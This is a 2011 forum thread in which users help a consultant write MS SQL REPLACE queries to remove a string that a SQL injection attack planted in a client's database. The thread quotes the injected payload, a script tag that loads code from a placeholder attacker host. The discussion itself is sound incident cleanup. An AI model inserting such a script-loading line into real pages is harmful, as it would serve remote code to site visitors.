« previous next »
Pages: [1]

Author Topic: sql geniuses  (Read 939 times)

41magsnub

  • friend
  • Senior Member
  • ***
  • Posts: 7,579
  • Don't make me assume my ultimate form!
sql geniuses
« on: December 14, 2011, 08:13:27 PM »
Disclaimer:  I do not manage SQL server for this customer and I know this is bad..  this is to fix the end result of a sql injection attack.  New customer, getting paid to fix and will make recommendations afterwards.  It is in MS SQL 2005

Their backups suck.  They are already working with some web devs to fix the code on their site so this can't happen in the future and I have revamped the backup scheme to something that actually, you know...  backs up somewhere.

There was a sql injection attack, the string:  "></title><script src="http://evilwebsite/file.php"></script><!--  was inserted just before the real data in gobs of fields in multiple tables.  Note the odd number of "'s

I am trying to write a sql replace query to wipe out the evil string with nothing to repair the DB.  It is not ideal but it is what we've got.  However, the jackasses who did the attack are smarter than me in SQL and stuck a " in the string so my commands fail due to the unclosed quotes.  Can one of you geniuses show me how to write a query that will do what I need with the screwy quotes?

I have the infected table up on another server right now to test on.
« Last Edit: December 14, 2011, 08:42:01 PM by 41magsnub »
Report to moderator   Logged

GigaBuist

  • friends
  • Senior Member
  • ***
  • Posts: 4,345
    • http://www.justinbuist.org/blog/
Re: sql geniuses
« Reply #1 on: December 14, 2011, 09:00:12 PM »
Code: [Select]
UPDATE tblData
SET txtField = REPLACE(txtField, '"></title><script src="http://evilwebsite/file.php"></script><!--', '');
If you start with single quotes I don't think the double quotes will cause you any trouble.  If they do escape them with a backslash (\):
Code: [Select]
UPDATE tblData
SET txtField = REPLACE(txtField, '\"></title><script src=\"http://evilwebsite/file.php\"></script><!--', '');

Edited post to stick SQL into code blocks.  Should make it easier to tell when I use apostrophe, double quotes, and two apostrophes together.
« Last Edit: December 14, 2011, 09:04:58 PM by GigaBuist »
Report to moderator   Logged

41magsnub

  • friend
  • Senior Member
  • ***
  • Posts: 7,579
  • Don't make me assume my ultimate form!
Re: sql geniuses
« Reply #2 on: December 14, 2011, 09:32:41 PM »
thanks!  I'll give that a whack.
Report to moderator   Logged

41magsnub

  • friend
  • Senior Member
  • ***
  • Posts: 7,579
  • Don't make me assume my ultimate form!
Re: sql geniuses
« Reply #3 on: December 14, 2011, 09:53:46 PM »
moot point, the data is pretty static and they are going to roll back to the one backup I found from a couple of months ago.  I'll play with this tomorrow though.

Thanks again!
Report to moderator   Logged

CNYCacher

  • friend
  • Senior Member
  • ***
  • Posts: 4,438
Re: sql geniuses
« Reply #4 on: December 14, 2011, 11:52:11 PM »
You were getting tripped up because you were using double quotes around the ting you were searching for.

Let's say that this is the malicious code:
foo"bar

You were trying to match it like this: "foo"bar"
Which was obviously breaking

Get around it by doing this instead: 'foo"bar'
Or this: "foo\"bar"

This will not work: 'foo\"bar'
Report to moderator   Logged
On two occasions, I have been asked [by members of Parliament], "Pray, Mr. Babbage, if you put into the machine wrong figures, will the right answers come out?" I am not able to rightly apprehend the kind of confusion of ideas that could provoke such a question.
Charles Babbage
Pages: [1]
« previous next »